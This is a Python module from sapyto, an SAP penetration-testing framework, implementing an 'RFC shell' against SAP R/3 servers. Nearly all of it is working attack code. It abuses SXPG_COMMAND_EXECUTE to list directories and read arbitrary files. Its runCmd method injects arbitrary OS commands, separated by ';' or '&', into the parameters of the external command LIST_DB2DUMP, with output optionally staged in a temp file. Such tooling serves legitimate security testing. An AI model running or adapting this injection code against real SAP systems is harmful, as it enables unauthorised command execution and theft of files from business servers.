# -*- coding: latin-1 -*-
'''
rfcShell.py

Copyright 2007 Mariano Nuez Di Croce @ CYBSEC

This file is part of sapyto, http://www.cybsec.com/EN/research/tools/sapyto.php

sapyto is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.

sapyto is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with sapyto; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
'''
import core.output.outputManager as om
import core.kb.knowledgeBase as kb
from core.sapytoException import sapytoException
import saprfc
import saprfcutil
import re
from core.misc import *
import core.fuzzer as fuzzer

class rfcShell:
	'''
	This class represent a RFC Shell.
	It can be used to execute commands, read files and list directories in SAP R/3 servers.
	Designed to be used in direct connections to R/3s (you would need user/password) or in callback attacks.
	
	@author: Mariano Nuez Di Croce <mnunez@cybsec.com>
	'''
	
	def __init__(self, conn):
		'''
		parameter @conn: Connection to r/3 system (already connected)
		'''
		self._conn = conn
		self._iface = None
		self._path = ''
		self._fuzzer = fuzzer.fuzzer()
		
		# Do connection if disconnected
		if not self._conn.is_connected():
			self._conn.connect()
		
		# We will need SYSTEM_INFO information. If sapinfo plugin has not been called, we call it.
		conn2 = saprfc.conn(ashost = self._conn.ashost, gwhost = self._conn.gwhost, gwserv = self._conn.gwserv, user = 'foo', passwd = 'foo')
		if not kb.kb.getData( 'sapinfo', 'systeminfo'):
			import plugins.audit.sapinfo as sapinfo
			si = sapinfo.sapinfo()
			si.setConn(conn2)
			si.run()
		
		# Detection of operating system
		self._opsys = kb.kb.getData( 'sapinfo', 'systeminfo')['RFCOPSYS']

		# InitialPath 
		if re.compile('Microsoft|Windows').search(self._opsys):
			self._path = 'c:\\'
		else:
			self._path = '/'
	
	def listDir(self, dir=''):
		'''
		Calls SXPG_COMMAND_EXECUTE to list directories from SAP R/3 filesystem.
		It automatically detects remote operating system.
		
		@parameter dir: Directory to list
		@return: A string containing directory listing
		'''
		if not dir:
			dir = self._path
			
		self._iface = saprfc.iface("SXPG_COMMAND_EXECUTE")
		self._iface.addParm(saprfc.parm("COMMANDNAME", "", saprfc.RFCEXPORT, saprfc.RFCTYPE_CHAR, 12, 0, 'LIST_DB2DUMP'))
		self._iface.addParm(saprfc.parm("OPERATINGSYSTEM", "", saprfc.RFCEXPORT, saprfc.RFCTYPE_CHAR, len(self._opsys), 0, self._opsys))
		self._iface.addParm(saprfc.parm("ADDITIONAL_PARAMETERS", "", saprfc.RFCEXPORT, saprfc.RFCTYPE_CHAR, len(dir), 0, dir))
		it = saprfc.parm("EXEC_PROTOCOL", "", saprfc.RFCTABLE, saprfc.RFCTYPE_CHAR, 80)
		self._iface.addParm(it)
		try:
			saprfcutil.call_receive(self._conn, self._iface)
		except:
			raise sapytoException('Cannot call SXPG_COMMAND_EXECUTE on remote system')
		else:
			res = ''
			for l in it.value:
				# Remove first numbers
				res += l[3:] + '\n'
			return res
	
	def readFile(self, file):
		'''
		Calls SXPG_COMMAND_EXECUTE to read files from SAP R/3 filesystem.
		It automatically detects remote operating system.
		
		@parameter file: File to read (USE ABSOLUTE PATHS!)
		@return: A string containing file contents
		'''
		self._iface = saprfc.iface("SXPG_COMMAND_EXECUTE")
		cmd = 'DISPLAY_DIAGLOG'
		if re.compile('UNIX').search(self._opsys):
			# Using 'cat', instead of 'tail'
			cmd = 'CAT'
		self._iface.addParm(saprfc.parm("COMMANDNAME", "", saprfc.RFCEXPORT, saprfc.RFCTYPE_CHAR, len(cmd), 0, cmd))
		self._iface.addParm(saprfc.parm("OPERATINGSYSTEM", "", saprfc.RFCEXPORT, saprfc.RFCTYPE_CHAR, len(self._opsys), 0, self._opsys))
		self._iface.addParm(saprfc.parm("ADDITIONAL_PARAMETERS", "", saprfc.RFCEXPORT, saprfc.RFCTYPE_CHAR, len(file), 0, file))
		it = saprfc.parm("EXEC_PROTOCOL", "", saprfc.RFCTABLE, saprfc.RFCTYPE_CHAR, 80)
		self._iface.addParm(it)
		try:
			saprfcutil.call_receive(self._conn, self._iface)
		except:
			raise sapytoException('Cannot call SXPG_COMMAND_EXECUTE on remote system')
		else:
			res = ''
			for l in it.value:
				# Remove first numbers
				res += l[3:] + '\n'
			return res
	
	def runCmd(self, cmd, writeToFile=0):
		'''
		Calls SXPG_COMMAND_EXECUTE to run commands in SAP R/3 servers.
		It automatically detects remote operating system.
		Performs an command injection in available EXTERNAL COMMANDS.
		
		@parameter cmd: Command to run
		@parameter writeToFile: Specifies if the output of the command is written to a temporary file and then retreived with readFile()
		@return: A string containing command output
		'''
		self._iface = saprfc.iface("SXPG_COMMAND_EXECUTE")
		self._iface.addParm(saprfc.parm("COMMANDNAME", "", saprfc.RFCEXPORT, saprfc.RFCTYPE_CHAR, 12, 0, 'LIST_DB2DUMP'))
		self._iface.addParm(saprfc.parm("OPERATINGSYSTEM", "", saprfc.RFCEXPORT, saprfc.RFCTYPE_CHAR, len(self._opsys), 0, self._opsys))
		
		
		# Perform injection and set values according to opsys
		fname = 'sapyto.tmp'
		if re.compile('Microsoft|Windows').search(self._opsys):
			tmpfile = 'c:\\temp\\' + fname
			cmdSep = '&'
		else:
			tmpfile = '/tmp/' + fname
			cmdSep = ';'
			
		if writeToFile:
			cmdToRun = ' ' + cmdSep + ' ' + cmd + ' > ' + tmpfile
		else:
			# To delimit previous command, we create a random string to use as delimiter
			delim = self._fuzzer.createRandAlpha(30)
			# Unknow directory, to reduce processing and output size
			unknow = self._fuzzer.createRandAlpha(10)
			cmdToRun = unknow + ' ' + cmdSep + ' echo ' + delim + ' ' + cmdSep + ' '  + cmd 
		
		self._iface.addParm(saprfc.parm("ADDITIONAL_PARAMETERS", "", saprfc.RFCEXPORT, saprfc.RFCTYPE_CHAR, len(cmdToRun), 0, cmdToRun))
		it = saprfc.parm("EXEC_PROTOCOL", "", saprfc.RFCTABLE, saprfc.RFCTYPE_CHAR, 80)
		self._iface.addParm(it)
		try:
			saprfcutil.call_receive(self._conn, self._iface)
		except:
			raise sapytoException('Cannot call SXPG_COMMAND_EXECUTE on remote system')
		else:
			
			if writeToFile:
				return self.readFile(tmpfile)
			else:
				res = ''
				delimFound = 0
				# Ignores lines previous to delimiter
				for l in it.value:
					# Remove first numbers
					line = l[3:].strip()
					if delimFound:
						res += line + '\n'
					if line == delim:
						delimFound = 1
				return res
	
	def setInitPath(self, path):
		self._path = path
	
	def getPath(self):
		return self._path
	
	def cd(self, dir):
		'''
		Do a 'virtual' change of directory.
		
		@parameter dir: New Directory
		@returns: actual directory
		'''
		fs = getFS(self._opsys)
		self._path += dir + fs	
		return self._path
		

	def disconnect(self):
		'''
		Terminates RFCShell connection
		'''
		self._conn.close()
	

